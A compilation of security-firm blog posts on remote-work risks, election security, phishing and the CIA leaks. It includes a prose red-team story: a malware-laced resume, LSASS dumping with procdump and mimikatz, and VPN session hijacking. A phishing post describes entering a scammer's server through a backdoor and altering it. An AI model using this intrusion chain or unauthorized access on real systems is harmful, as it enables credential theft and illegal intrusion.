Protecting Your Business From Your Remote Workforce

A significant portion of your workforce is currently moving to perform full- or part-time remote work as a result of COVID-19.  As you modify your business processes and workflows to accommodate this change, it’s important to understand how remote work affects your cybersecurity posture and what openings and opportunities exist for cybercriminals to take advantage of you.  We would like to take this opportunity to provide advice on how to orient your security posture to account for this increased threat vector and illustrate several common patterns of weakness.

VPNs

Long touted as the safest and most-reliable way to enable remote work, Virtual Private Networks (VPNs) allow a user to access internal enterprise resources and applications from any internet connection.  VPN connections are encrypted, preventing untrusted network operators (such as your local coffee shop) from snooping on sensitive traffic, but they don’t solve every security problem.

Risks:

  • VPNs weaken the network boundary by allowing additional devices into the most vulnerable part of a company’s IT infrastructure – its internal network
  • Compromised user accounts can give attackers direct access to many internal resources
  • Granting VPN access to untrusted devices is equivalent to plugging that device directly into your network, along with any infections it might have

The more users which utilize your VPN, the more likely it is that you are giving an attacker access to your internal network by way of a compromised user device.  When VPN is allowed on non-corporate provisioned machines, this risk is even greater.  If an attacker does gain this access, it can be devastating because frequently internal enterprise networks are the most vulnerable parts of an enterprise network.

Solutions:

  • Create a separate User Account specifically for VPN access for each user
  • Place VPN user accounts into a restricted Organizational Unit with as few privileges as possible. For example, if you run Citrix, only allow VPN user accounts to sign onto Citrix desktops.
  • Set up Two-Factor Authentication (2FA) for all users and VPN user accounts to increase difficulty for attackers
  • Install a Honeypot on your internal network to help identify suspicious network activity coming from one remotely connected device

The Vexing VPN - in a split tunnel, security solutions only see traffic destined for the enterprise.
A Note on VPN Configurations:

VPNs also have the option to perform Full or “Split” tunneling.  Full tunneling forces all network traffic to go over the VPN connection including traffic unrelated to the corporate network such as YouTube or Skype.   In a split tunnel VPN, only traffic destined for internal corporate services directly would travel over the VPN connection.

Split tunnel is therefore less secure than a full tunnel configuration because in a full tunnel your remote users will still be protected by your existing network security appliances such as content filters and/or next-gen firewalls.  This comes with an expensive tradeoff, though – you must have enough bandwidth to serve all your users browsing habits!

Two Factor Authentication (2FA)

It’s extremely important that you have 2FA deployed within your organization.  It helps prevent compromise when user credentials are leaked as a part of a breach and makes it more difficult to obtain user credentials through phishing attacks.  With that said, you should be aware that 2FA is not a silver bullet for protecting user credentials on all services because 2FA can be bypassed when user devices have been compromised.

Two Factor Hangover

Risks:

  • Compromised devices which are used to prompt the user for a 2FA token may relay the token to an attacker
  • Compromised devices may allow an attacker to steal session information and impersonate affected users

As an example, by stealing/intercepting a session cookie for a service to which the user has already authenticated, an attacker may gain direct access to the application without needing to authenticate. Many applications (e.g. Cloud-Based email, Collaboration tools) do not tie their session cookie to a single device/source IP/location because if they did, roaming mobile users would have to reauthenticate as their device switches from WIFI to 4G or 5G connections. As a result, it is usually possible for an attacker to reuse the same session as a legitimate user.

Solutions:

  • Monitor your application logs for access from suspicious geographical locations unrelated to your typical user or business locations
  • Do not share sensitive information such as passwords in email or chat
  • Train your employees to report suspicious activity such as disappearing incoming email, email switching from read to unread without explanation, or password reset emails

EndPoint Security

When your users work from home, they have a greater exposure to cybersecurity threats because inevitably they will be using their devices for both business and pleasure.  This increased usage is even more dangerous when paired with a split-tunnel VPN which does not force browser traffic to flow through enterprise security appliances and controls.

Risks:

  • Antivirus/Antimalware solutions can be bypassed more easily as users are outside of the protections of enterprise networks
  • Traffic visibility may be significantly reduced
  • Users will use their devices for personal browsing/activities which increases their exposure

Since your users will be using their devices more (regardless of it they are corporate or personal) they will be more likely to encounter more threats, making patching and antivirus updates critical but potentially unreliable if you do not use a VPN or allow personal devices on the network.

Solutions:

  • Provide up-to-date devices configured with more aggressive security profiles to high-risk individuals such as Executives and Executive Assistant staff
  • Closely monitor inbound and outbound connections on your remote devices
  • Step up social engineering defense training to help combat COVID-19 related scams
  • Educate your employees not to store or share credentials outside of password safe solutions such as 1Password, Keepass, Lastpass, or Dashlane.

Final Words:

Even when lockdowns and restrictions around the coronavirus are lifted, the volume of remote workers is likely to increase.  As we’ve shown, remote users are under an increased risk because they are outside of enterprise security appliances, encountering more threats by utilizing the same devices for both business and pleasure, and aren’t necessarily covered by existing security controls.  With this in mind, it’s important to be proactive and set up increased logging, provide updated and secured devices to high-risk individuals within your organization, and limit the access that users have through VPN connections.

We hope that you stay safe, both online and off, and that you keep us in mind if you’re seeking to audit your remote worker security solutions.  In the coming week, we will be providing pricing packages specifically designed around auditing remote work solutions.

The Security Risks Behind Voting Machines & Mail-in Ballots

In recent months, the security of absentee voting, widely used due to the threat of the COVID-19 pandemic, has been called into question. But are these processes any less secure than the electronic voting systems used on a “normal” election day?

Is Mail-In Voting Safe?

Introduction to Electronic Voting System Security

Electronic voting systems come in a number of different forms. At the polls, a voter may experience a few different types of voting systems:

  • Paper Ballots: Paper ballot systems have voters fill out ballots by hand with paper and pens/pencils or hole punches. These ballots may then be scanned in order to rapidly tally votes.
  • Electronic Systems: Purely electronic systems allow voters to vote on a touchscreen computer. In some states, votes are only stored and tallied electronically with no backups.
  • Hybrid Systems: Some systems will allow voters to cast votes with a touchscreen, then print a paper ballot for them to verify. This leaves a paper trail of their choices, however, a study indicated that 94% of voters didn’t notice that their votes had been changed.

Known Security Issues of Electronic Voting Systems

Electronic voting machines have a number of different security issues, many of them known for over a decade. The issues with electronic voting and the challenges of fixing them have been demonstrated by a number of different cases, including:

  • Insecure Voting Machines: An assessment of the security of over 100 voting machines at the 2019 DEFCON conference found that all of them contained exploitable vulnerabilities, including weak default passwords, built-in backdoors, etc.
  • Lack of Support for Penetration Testing: Security assessments of voting machines are limited by a lack of manufacturer support, and interpretations of the Computer Fraud and Abuse Act that make such assessments illegal. An amicus brief to the Supreme Court regarding the case advocated for limiting security research to researchers authorized by the company under test, enabling the company to conceal any findings.
  • Use of Outdated Software: A survey completed in July and August 2019 of 56 election commissions and Secretaries of state found that over half of voting systems in use ran Windows Server r2 2008, which reached end-of-life January 14, 2020.

These issues point to the conclusion that a determined attacker could easily breach the US election infrastructure if they chose to do so. The fact that this has not occurred is attributed to the fact that no threat actor has chosen to do so. In fact, Russia is believed to have gained access to voter registration systems in several states in 2016 but chose not to take action on it.

However, this lack of discovered breaches may have resulted from a lack of looking for them. In 2018, Netragard performed an analysis of the Crosscheck system designed to detect voters casting multiple ballots in different jurisdictions. Based upon analysis of public information, several vulnerabilities were discovered, but they could not be followed up on because hacking election infrastructure is illegal.

After hearing of the assessment, a Kansas official claimed that our team “didn’t succeed in hacking it.” Later a different claim by another Kansas legislator claimed that a “complete scan” did not find any evidence of attackers exploiting the vulnerabilities to breach the system. This is despite the fact that no vulnerability scan could detect a breach and that no evidence exists of a digital forensics investigation occurring to identify a potential breach.

At the end of the day, the answer to the question of whether or not a hacker could breach US election infrastructure is “almost certainly”. However, no evidence exists of this occurring, potentially because no conclusive investigation has been performed.

Introduction to Mail-In Ballot Security

In most states, voting via an absentee or mail-in ballot is a two step-process. The first step is submitting an absentee ballot request. If this request is validated, an absentee ballot is sent to the voter’s registered address to be completed and returned via mail or an election dropbox.

The validation steps for absentee ballot requests and ballots vary from state to state. Each state performs at least one (and often several) of the following checks:

  • Envelope Verification: A ballot is only valid if returned in the official envelope. All ballots returned in a different envelope are discarded.
  • Signature Verification: Many states require a signed affidavit by the voter, and, in some states, election officials compare the signatures on the ballot and on a voter’s official registration. Mismatched signatures are the most common method by which voter fraud is detected.
  • Voter Identification: Many states will require a voter to submit some form of identification with their ballot, such as a photocopy of their driver’s license or part of their Social Security Number (SSN).
  • Witness Signature: Some states require the signatures of one or more witnesses or a public notary on a mail-in ballot.

Known Security Issues of Mail-In Ballots

The Heritage Foundation keeps a record of every case of alleged voter fraud that has been reported to date. This database includes a variety of different voting crimes, including fraudulent registrations, misuse of absentee voting, coercion of voters at the polls, and more. To date the Heritage Foundation has recorded 1,298 cases of alleged voter fraud between 1988 and 2020, though some of its claims are unsupported or incorrect.

Of these 1,298 cases, the Heritage Foundation claims that 207 individuals have been involved in 153 distinct cases of voter fraud that involved the use of absentee ballots. Of these cases, 39 (involving 66 individuals) have included a deliberate attempt to change the results of an election. Other cases involve people voting for a recently deceased spouse or relative, a single person voting twice in different jurisdictions, using a previous mailing address on a ballot, mailing in the ballot of a non-relative (which is illegal in many jurisdictions), and other small-scale errors or attempts at fraud.

In general, attempts to change the results of an election via mail-in voter fraud have focused on local elections with a small margin. One of the larger cases of fraud on record (Miguel Hernandez, 2017) involved an individual forging absentee ballot requests and collecting and mailing the ballots after the voters had completed them. This incident included only 700 mail-in votes, and the actual voting was performed by the authorized voters. Even if Hernandez forged the votes, the impact on a US Presidential election would be negligible.

For comparison, over 125 million votes were cast in the 2016 election. According to the Heritage Foundation, there were six attempts at absentee ballot fraud in the 2016 Presidential Election:

  • Audrey Cook voted on behalf of deceased husband
  • Steven Curtis (head of Colorado Republican Party) forged his wife’s signature on her ballot
  • Terri Lynn Rote tried to vote twice due to her fear that the election was rigged
  • Marjory Gale voted for herself and her daughter who was away at college
  • Randy Allen Jumper voted twice in two different jurisdictions
  • Bret Warren stole and submitted five absentee ballots that voters complained about never receiving and were allowed to cast provisional ballots

These cases are clear examples of voter fraud in the 2016 election. However, even if they were undetected and all voted the same way, ten votes are unlikely to have any impact on the election. In fact, an election commission looked into the claims of 3-5 million fraudulent votes being cast in the 2016 election. Claims were was disbanded with no findings.

Comparing Electronic Voting Systems and Mail-In Ballot Security

At the end of the day, there is no evidence of election interference or voter fraud using electronic voting machines or mail-in ballots. While six counts of misuse of absentee ballots were detected in the 2016 Presidential election, they comprised a total of ten votes.

If anything, the threat of glitches in electronic voting machines should be considered a major threat to election security. In 2019, analysis of the paper record of a “glitchy” voting machine led to the discovery that in a local Pennsylvania election, a candidate who only had 15 recorded votes actually won the election by over 1,000.

While mail-in ballots have their issues (like an overburdened postal system), electronic voting machines are much less secure and reliable. The fact that an unknown number of electronic voting systems are connected to the Internet, making them accessible to hackers and vulnerable to malware, creates a much greater exposure to election meddlers than absentee ballots, which must be physically collected and filled out to be used in fraud.

What Thieves Know About Anti-Phishing Solutions & What This Means To You

Without taking proper precautions, your computer is a veritable smörgåsbord for hackers. Hackers have developed an array of techniques to infiltrate your system, extract your data, install self-serving software, and otherwise wreak havoc on your system. Every network in the world is vulnerable to hacking attempts; it’s simply a matter of which systems the hackers deem worth the effort. Preventing hackers from successfully compromising your data requires an understanding of the various solutions. However, very few of those solutions are truly effective.

The Differences Between Phishing and Spear Phishing

Phishing casts a wide net to hundreds, thousands or even millions of email addresses. Phishing can be used to steal passwords, perform wide-scale malware deployment (think WannaCry), or even as a component of disinformation campaigns (think Russia). More often than not phishing is carried out by financially motivated criminals. In most cases, the phishing breaches are not detected until it is too late and it is nearly impossible to prevent damages.
Spear phishing, like the name implies, is a more targeted version of phishing. Spear phishing campaigns are generally conducted against companies, specific individuals, or small groups of individuals. The primary goal of spear phishing campaigns is to make entry into a target network. The DNC hack for example, was accomplished by using spear phishing as an initial method of breach. Once the breach was affected the hackers began performing Distributed Metastasis (aka pivoting) and secured access to sensitive data.
In nearly all cases, businesses and governments are ill prepared to defend against phishing attacks. This is in part because the solutions that exist today are largely ineffective. Most commercial phishing platforms provide the same basic level of benefit as automated vulnerability scanners. If you really want to defend against phishing then you need to use a solution designed specifically for you and your network.

Real (not commercial) Tactics For Phishing and Spear Phishing

An email will go out, supposedly from a trusted source. In reality, it will be a chameleon domain set up specifically by the hackers to leverage your trust. A chameleon domain is a domain which appears to be the same as your company’s domain or a high profile domain but isn’t. (The domains are often accompanied by a clone website with a valid SSL certificate.) For example, instead of linkedin.com, the chameleon domain might be 1inkedin.com. These two domains might look identical at a glance, but in the second the L of LinkedIn is exchanged for the number one. Historically, hackers used Internationalized Domain Name (IDN) homograph attacks to create chameleon domains, but that methodology is no longer reliable.
An email might also arrive from a different Top Level Domain (TLD). Let’s say, linkedin.co, linkedin.org, or even linkedin.abc. There are many opportunities for deception when it comes to creating a chameleon domain. All of these oppotrunities exist because the human brain will read a word the same way so long as the first and last letter of the word are in the correct place. For example, you will likely fall victim to phishing if you just the word “opportunities” and didn’t notice that we swapped the places of the letters “T” and “R”. Experienced hackers are masters at exploiting this human tendency.  (https://www.mrc-cbu.cam.ac.uk/people/matt.davis/cmabridge/)
When (spear) phishing is combined with malware it becomes a powerful weapon. A common misconception is that antivirus and antimalware software will protect you from infection. If that were in fact true, then things like the recent WannaCry (MS17-010) threat would never have been a problem.  The reality is that antivirus technologies aren’t all that effective at preventing infections. In fact, Intrusion Prevention Systems (IPS) also aren’t all that effective at preventing intrusions. If they were then we would not be seeing an ever-increasing number of breached businesses (nearly all which use some form of IPS or third party MSSP).
The bad guys may target 3 or 30 people with a spear phishing attack. To be successful with a well-crafted attack they only need a single victim.  That victim usually becomes their entry point into a network and from there it is only a matter of time until the network is fully compromised.  With a normal phishing attack, campaigns with larger numbers of victims are desirable. More victims equates to more captured data.

Businesses Making Money from Anti-Phishing

For some companies, there’s not a week that goes by without a phishing attempt landing in their email server. They are the consternation of companies everywhere.
Security companies, concerned about the devastation that phishing and spear phishing efforts can rain, have taken up the mantle of offering education about phishing to their clients. They have special programs for mid- and large- level corporations to combat phishing efforts.
Once a company signs up for education it’s common to test the company soon afterward to see what needs to be covered. For instance, a phishing attempt is made against half or all of a company. It will be a typical, run-of-the-mill ‘attack,’ where the users are given a convenient link and encouraged to go there to ‘make it right’ again.
After clicking on the link, the user is taken to a site which informs them that they were phished, how they were phished, and safety measures to prevent future successful phishing. Information about the success rate of the phishing attempt is also gathered, so the security company has a baseline. From that information, educational materials are given to the company for further training.
A set amount of time later, usually a few months, the security company runs the same type of phishing attempt on the employees of the target company. The success rates are then compared (the second try usually has fewer people who were fooled) and the target company receives certification that they are safer from phishing attempts now that they have been educated.

How Effective Are Anti-Phishing Companies?

Employing an anti-phishing security firm can provide a false sense of security for companies that would be vulnerable to phishing attempts. Going through the education prevents the likelihood of a blatant and basic phishing attempt from being successful, but it usually does not do much to prevent a real-world, targeted attack, especially a spear phishing one.
Anti-phishing companies generally use automated systems to test a company’s phishability. They use the most rudimentary phishing techniques, but many advertise that their solutions will be more effective than they actually are against real-world phishing attempts. In other words, these anti-phishing companies generally provide a political solution rather than a real solution to the problem of phishing and spear phishing. This very similar to how vulnerability scanning companies market themselves.
The people who want to break into a company’s system are patient. They custom-create a strategy to get into your systems, not send a blanket email to everyone in the company. It’s too blatant. Their attempts to socially engineer a favorable outcome are most likely going undetected.
The biggest question that an anti-phishing company has to ask itself is whether they are providing the level of security that they are promoting. By certifying employees as being phish-proof, does that mean that those employees are truly savvy enough to detect ANY phishing attempt? Is the security company simply marketing, or is it truly interested in protecting their clients against phishing?
Before going with a company that advertises anti-phishing education, keep in mind that spear phishing is highly customized and most likely won’t come to you as an email from Paypal, LinkedIn, or another popular site. It will most likely come to you from someone you know, possibly within your own company. Ask them what measures they plan to take to help you truly fight against the spear phishing attacks at your company.
 

What they are not telling you about the CIA leaks.

_95042278_f3058f0e-4e13-44a3-8c07-6d42b3597598The CIA leaks are making huge waves across the world. In a nutshell, the documents claim to reveal some of the hacking capabilities that the CIA has. Many privacy advocates believe that exposure of secrets like these is a net benefit for citizens because it provides transparency in government action. The media also likes leaks like these because it provides excellent story fodder.
But there is one thing that no one is talking about with these leaks that has serious long-term consequences with all of our foreign relationships. The concept is called attribution in the intelligence field, and it’s important that everyone get an idea of what it is and why it is important so they can put the real danger of these leaks into the proper context.

What is Attribution?

Attribution is the ability to accurately trace back evidence of a situation back to whoever did it. Even if you don’t know the term, these examples will make it quite clear. Let’s say you’re a child on a school playground. You tell your best friend a secret that you don’t want anyone to know about. A few days later, the whole school knows. If you know you didn’t tell anyone, who told the secret? The obvious one to blame is the best friend. That breach of trust could end your friendship.
That’s a simple example. A more complex one is a murder case. Let’s say that your neighbor kills your best friend in your house, but isn’t caught. Instead, you are accused and you spend a lot of money on lawyers to get the charges dismissed. Your reputation is damaged, but you stay out of jail. The case grows cold.
Now, let’s say over time you become close friends with your neighbor. Later, for whatever reason, the neighbor gets his DNA analyzed and there is a match to the old murder. The neighbor might get arrested, but how would you react?
In the first case, the fact that only one other person knew the secret and leaked it makes us able to attribute the link to the person. In the second, a telltale fingerprint that’s impossible to forge creates an attribution that wasn’t there before and provides ironclad evidence that you weren’t involved.

Leaking and Attribution

 Put bluntly, the general public and the media are overreacting in how much the CIA might or might not be using the things leaked to spy on them. A much more serious concern is what every other government in the world is thinking about the information in these leaks. Here’s why.
One of the roles of any government is to protect the interests of the country and its citizens. Countries use intelligence networks, spies, hacking, and other espionage techniques to gather information in advance about what their enemies and their allies might do next. Failing to get that knowledge puts the country at risk of something called information asymmetry. Other countries can get more information about you than you can about them. It’s like they can peek at your hand in a game of poker before the betting round, but you can’t.
The CIA’s role in America’s spy networks is international intelligence. The CIA isn’t going to turn their attention to people inside of the U.S. unless there is an extraordinarily good reason, despite what conspiracy theorists may think. But foreign governments definitely know the CIA will have at least thought about spying on them at some point. However, unless a spy was caught red-handed and confessed they were a CIA operative, it’s hard for a country to accuse us of spying on them in a specific instance. In short, there is no attribution. Just guesses.
What the CIA leaks do is give information to every government who wants to know how we might hack them. It is extremely difficult to attribute a hacking attack to a specific state actor, despite what the media and television might lead you to believe. You might be able to detect the attack and gather forensic evidence about a hacking incident, but until you can get definitive proof that another country knew about that particular exploit at the time of the attack and had the tools necessary to leverage it, you can’t say for certain. The leak now gives other governments details they can use to analyze their old forensic data and see if there is a match, much like the DNA evidence in the earlier example.
In short, now they can prove that we peeked at their poker hands and know how we did it. The how is also crucial not just for attribution, but for how hacks are conducted between governments.

Hidden Exploits

99.9% of all breaches are the result of the exploitation of known vulnerabilities (for which patches exist), many of which have been published (open to the public) for over a year. But those aren’t the vulnerabilities that governments generally want to exploit. They want to target 0-day vulnerabilities with 0-day exploits. A 0-day vulnerability is a bug in software that is unknown to the vendor or the public.  A 0-day exploit is the software that leverages a 0-day vulnerability usually to grant its user access to and control over the target. 0-day’s are the secret in the playground of geopolitical hacking.
Governments want to keep some 0-day exploits as state secrets. The time for a defense to be built against a revealed exploit can be as little as 24 hours. A 0-day exploit can be used for 6 months or even years. That is a lot of time for a government. But governments don’t want to use these too often anyway. Each time a 0-day exploit is used successfully, it leaves behind some form of forensic evidence that could be used later to gain attribution. The first time might be a surprise. The second will reveal similar patterns with the two attacks. The third time runs the risk of getting caught.
The value of these exploits varies and is determined by operational need, how rare the exploit is, how likely it is to be discovered or detected, etc.  Governments can pay as little as tens of thousands of dollars to as much as several million dollars for a single zeroday exploit.. Each time a 0-day exploit is used its lifespan is shortened significantly.  In some cases, a 0-day is only used once before it is exposed (burnt).  In other cases, 0-day exploits may last years before they are burnt.  One thing is always true.  If governments are going to spend millions of dollars on 0-day exploits, then they are not likely to use them on low-value targets like everyday civilians or for easily detected mass exploitation. They are far more likely to be used for high-value, well protected targets where detection of breach simply isn’t an option.
Because these are not open secrets, when 0-day exploit information is released in a leak it makes it extremely easy to attribute attacks to a state and it diminishes that states’ intelligence capabilities. Furthermore, now every other government has leverage against that state, and could even have grievances. They could feel like the unjustly accused murder suspect. And unlike the suspect, states have options that citizens do not in terms of how they can retaliate such as levying sanctions or declaring war. Worse, they could even gain the moral high ground even though they might be doing the same thing because the managed to keep their intelligence information secret.
Regardless of whether you think leakers and whistleblowers are heroes or traitors, there are consequences for leaking intelligence information to the world. The average American citizen doesn’t know and can’t know what the foreign consequences will be. Before you go out and cheer the next leak, consider what the consequences might be for our country now.  What does it mean when we lose our intelligence capabilities and our enemies don’t? What does it mean when our enemies and allies know just how, when, and most importantly, who managed to hack them?

EXPOSED: How These Scammers Tried To Use LinkedIn To Steal Our Client’s Passwords

Earlier this morning one of our more savvy customers received an email from [email protected]. The email contained a “New Message Received” notification allegedly sourced from CEO Tom Morgan. Contained in the email was a link that read, “Click here to sign in and read your messages”. Fortunately we had already provided training to this particular customer that covered Social Engineering and Phishing threats. So, rather than click on the link they forwarded the email to Netragard’s Special Project Team, which is like throwing meat to the wolves. The actual email is provided below in figure 1.
Figure 1
Figure1
The first step in learning about who was behind this threat was to follow the “click here” link. The link was shortened using the URL shortener ow.ly and so we used curl to expand it. While we were hopeful that the URL would deliver some sort of awesome zeroday or malware, it didn’t. Instead it served up a fake LinkedIn page (Figure 2) designed to steal login and password information.
Figure 2
figure2
The server hosting the phishing site was located in Lebanon and of course was not maintained or patched properly. Quick reconnaissance showed that directory listing was enabled, that the server was using an outdated and very exploitable version of cPanel, and that the server had been breached by at least four other parties (there were at least 4 backdoors installed). We used one of the backdoors to gain access to the system in the hopes of learning more (Figure 3).
Figure 3figure3
 
Our team quickly zeroed in on the “linkd.php” file that was used to generate the phishing page shown in Figure 2.   We explored the file looking for information related to where stolen passwords were being kept. Initially we expected to see the passwords logged to a text file but later found that they were being emailed to an external Gmail account. We also looked for anything that might provide us with information about who was being targeted with this attack but didn’t find much on the system.
We were able to identify the victims of the campaign by making hidden modifications to the attackers phishing platform. These modifications allowed us to track who submitted their credentials to the phishing site. When studying the submission data it quickly became apparent that the attackers were almost exclusively targeting Luxembourg based email addresses (.lu TLD’s) and were having a disturbingly high degree of success. Given that people often reuse passwords in multiple locations this campaign significantly increased the level of risk faced by organizations that employ the victims. More directly, chances are high that organizations will be breached using the stolen passwords.
The LinkedIn campaign was hardly the only campaign being launched from the server. Other campaigns were identified that included but may not be limited to DHL, Google, Yahoo and DropBox. The DropBox campaign was by far the most technically advanced. It leveraged blacklisting to avoid serving the phishing content to Netcraft, Kaspersky, BitDefender, Fortinet, Google, McAfee, AlienVault, Avira, AVG, ESET, Doctor Web, Panda, Symantec, and more. In addition to the blacklisting it used an external proxy checker to ensure page uptime.
Finally, we tracked the IP addresses that were connecting to the system’s various backdoor.  Those IP addresses all geolocated to Nigeria and are unfortunately dynamic.
Screenshot 2016-08-18 10.24.57
 
 
 
Summary
This phishing campaign highlights two specific issues that can both be countered with careful planning.  The first is that employees are easy to phish especially when they are outside of the office and not protected by spam filters.  This is problematic because employees often reuse the same passwords at work as they do outside of work.  So stealing a LinkedIn password often provides attackers with access to other more sensitive resources which can quickly result in a damaging breach and access to an organizations critical assets.   The solution to this issue is reasonably simple.  Employees should be required to undergo regular training for various aspects of security including but not limited Social Engineering and Phishing.  Second, Employers should require employees to use password management tools similar to 1Password.  Using password management tools properly will eliminate password reuse and significantly mitigate the potential damages associated with password theft.
As for our Nigerian friends, they won’t be operating much longer.

How we tricked your HR lady into giving us access to every customers credit card number

free-guide
We recently completed the delivery of a Realistic Threat PCI focused Penetration Test for a large retail company. As is always the case, we don’t share customer identifiable information, so specific details about this engagement have been altered to protect the innocent. For the sake of this article we’ll call the customer Acme Corporation.

When we were first approached by the Acme Corporation we noticed that they seemed well versed with regards to penetration testing. As it turned out, they had been undergoing penetration testing for more than a decade with various different penetration testing vendors. When we asked them how confident they were about their security they told us that they were highly confident and that no vendor (or hacker to their knowledge) had ever breached their corporate domain let alone their Cardholder Data Environment (CDE). We were about to change that with our Realistic Threat Penetration Testing services.

Realistic Threat Penetration Tests have specific characteristics that make them very different from other penetration tests.

The minimum characteristics that must be included for a penetration test to be called Realistic Threat are:

  1. IT/Security Staff must not be aware of the test.
  2. Must include solid reconnaissance.
  3. Must not depend on automated vulnerability scanners.
  4. Must include realistic Social Engineering not just elementary phishing.
  5. Must include the use of undetectable (and non-malicious) malware.
  6. Must be covert as to enable propogation of compromise.
  7. Must allow legitimate incident response from the customer.

Lets begin…

As with all engagements Netragard’s team began with reconnaissance. Reconnaissance is the military term for the passive gathering of intelligence about an enemy prior to attacking the enemy. It is what enables our team to construct surgical plans of attack that allow for undetected penetration into targeted networks. During reconnaissance we focus on mapping out all in-scope network connected devices using truly passive techniques and without making direct network connections. We also focus on passive social reconnaissance using everything from Facebook to LinkedIn to Jigsaw.

When Netragard finished performing reconnaissance against Acme Corporation it became apparent that direct technological attacks would likely not succeed. Specifically, Acme Corporation’s externally facing systems were properly patched and properly configured. Their web applications were using a naturally secure framework, appeared to follow secure coding standards, and existed behind a web application firewall. Firing off technological attacks would do little more than alert their IT staff and we didn’t want that (their IT staff were deliberately unaware of the test).

Reconnaissance also identified a related job opportunity posted on LinkedIn for a Sr. IT Security Analyst. Interestingly the opportunity was not posted on Acme Corporation’s website. When Netragard reviewed the opportunity it contained a link that redirected Netragard to a job application portal that contained a resume builder web form. This form was problematic because it worked against our intention to submit a RADON infected resume to HR. We backtracked and began chatting on LinkedIn with the lady who posted the job opportunity. We told her that the form wasn’t loading for us but that we were interested in applying for the job. Then she asked us if we could email our resume to her directly, and of course we happily obliged.

Our resume contained a strand of RADON 2.0. RADON is Netragard’s zeroday malware generator designed specifically with customer well-being and integrity in mind. A strand is the actual malware that gets generated.   Every strand of RADON is configured with an expiration date. When the expiration date is reached the strand entirely removes itself from the infected system and it cannot be run again. RADON was created because other tools including but not limited to Metasploit’s Meterpreter are messy and leave files or even open backdoors behind. RADON is fully undetectable and uses multiple, non-disruptable covert channels for command and control. Most importantly when RADON expires it leaves systems in a clean, unaltered, pre-infection state.

Shortly after delivering our infected resume, RADON called home and had successfully infected the desktop belonging to the nice HR lady that we chatted with on LinkedIn. Our team covertly took control of her computer and began focusing on privilege escalation. RADON was running with the privileges of the HR employee that we infected. We quickly learned that those privileges were limited and would not allow our team to move laterally through the network. To elevate privileges we impersonated the HR employee that we compromised and forwarded our infected resume to an IT security manager.   The manager, trusting the source of the resume, opened the resume and was infected.

In short time RADON running on the IT security manager’s desktop called home. It was running with the privileges of the IT security manger who also happened to have domain administrative privileges.  Our team ran procdump on his desktop to dump the memory of the LSASS process.  This is important because the LSASS process contains copies of credentials that can be extracted from a dump.  The procdump command is “safe” because it is a Microsoft standard program and does not trigger security alerts.   However the process of extracting passwords from the dump often does trigger alerts.  To avoid this we transferred the dump to our test lab where we could safely run mimikatz to extract the credentials.

Then we used the credentials to access all three of Acme Corporation’s domains and extracted their respective password databases. We exfiltrated those databases back to our lab and successfully cracked 93% of all the current and historical passwords for all employees at Acme Corporation. The total elapsed time between initial point of entry and password database exfiltration was 28 minutes. At this point we’d reached an irrevocable foothold in Acme Corporation’s network. With that accomplished it was time to go after our main target, the CDE.

The process of identifying the CDE required aggressive reconnaissance. Our team searched key employee desktops for any information that might contain credentials, keys, vpn information, etc.   Our first search returned thousands of files that spanned over a decade. We then ordered the files based on date of modification and content and quickly found what we were looking for. The CDE environment could only be accessed by two users via VPN from within Acme Corporation. Making things more complex was that the VPN was configured with two-factor authentication was not tied into the domain.

Fortunately for us, this is not the first time we’ve run into this type of configuration. Our first step towards breaching the CDE was to breach the desktop of the CDE maintenance engineer. This engineer’s job was to maintain the systems contained with in the CDE from both a functionality and security perspective. To do this we placed a copy of RADON on his desktop and executed it as a domain administrator using RPC. The new RADON instance running on the CDE maintenance engineer’s desktop called home and we took control.

We quickly noticed that various VPN processes were already running on the CDE maintenance engineer’s desktop. So we checked the routing table looking for IP addresses that we knew to be CDE related (from the files that we gathered earlier) and sure enough they existed. This confirmed that an there was an active VPN session from our newly compromised desktop into the CDE. Now all we had to do was hijack this session, breach the CDE, and take what we came for.

We used the net shell command (netsh) and created a port forward rule from the infected desktop to the CDE. We then used a standard windows RDP client to connect to the CDE server but when we tried to authenticate, it failed. Rather than risking detection, we decided to take a step back and explore the CDE maintenance engineer’s desktop to see if we could find credentials related to the CDE.   Sure enough we found an xls document in a folder named “Encrypted” (which it wasn’t) that contained the credentials that we were looking for. Those credentials allowed us to to log into the CDE without issue.

When we breached the CDE we noticed that our user was a domain administrator for that environment. As a result not only did we have full control over the CDE but our activity would appear as if it were normal maintenance rather than hacker related. In short time we were able to locate customer credit card data, which was properly encrypted. Despite this we were confident that we’d be able to decrypt it by leveraging discoveries from our previous reconnaissance efforts (we did not make that effort at the customers request).

When we began exploring avenues for data exfiltration we found that the CDE had no outbound network controls. As a result, if we were bad actors we could have sent the credit card data to any arbitrary location on the Internet.

In summary, there were three points of failure that enabled our team to breach the CDE. The first point of failure is unfortunately common; network administrators tend to work from accounts that have domain administrative privileges. What network administrators should do instead is to use privileged accounts only when needed. This issue is something that we encounter in nearly every test that we do and it almost always allows us to achieve network dominance.

The second point of failure was the VPN that created a temporary bridge from the LAN to the CDE. That VPN was configured with split tunneling. It should have been configured in such a way that when the computer was connected to the CDE it was disconnected / unreachable from the corporate network. That configuration would have prevented our team from breaching the CDE with the described methodology.

The third point of failure was that the CDE did not contain any outbound network controls.   We were able to establish outbound connections on any port to any IP address of our choosing on the Internet. This means that we were in a position to extract all of Acme Corporation’s credit card data without detection and without issue. Clearly, the correct configuration would be one that is highly restrictive and that alarms on unexpected outbound connections.

Finally, the differences between compliance and security are vast. In the past decade we’ve seen countless businesses suffer damaging compromises at the hands of malicious hackers. These hackers get in because they test with more talent, more tenacity, and more aggression than nearly all of the penetration testing vendors operating today. For this reason we can’t stress how important it is that businesses select the right vendor and test at realistic threat levels. It is impossible to build effective defenses without first understanding how a real threat will align with your unique risks. At Netragard, we protect you from people like us.

Ukrainian hacker admits stealing business press releases for $30M, What they’re NOT telling you -Netragard

The sensationalized stories about the hacking of PR Newswire Association, LLC., Business Wire, and Marketwired, L.P. (the Newswires) are interesting but not entirely complete.  The articles that we’ve read so far paint the Newswires as victims of some high-talent criminal hacking group.  This might be true if the Newswires actually maintained a strong security posture, but they didn’t.  Instead their security posture was insufficiently robust to protect the confidentiality, integrity or availability of the data contained within their networks.  We know this because enough telling details about the breach were made public (see the referenced document at the end of this article).
In this article we first provide a critical analysis of the breaches based on public information primarily from the published record.   We do make assumptions based on the information provide and our own experience with network penetration to fill in some of the gaps. We call out the issues that we believe allowed the hackers to achieve compromise and cause damage to the Newswires.   Later we provide solutions that could have been used (and can be used by others) to prevent this type of breach from happening again. If we miss something, or if we can add to the solutions that we provide please feel free to comment and we will update this article accordingly.
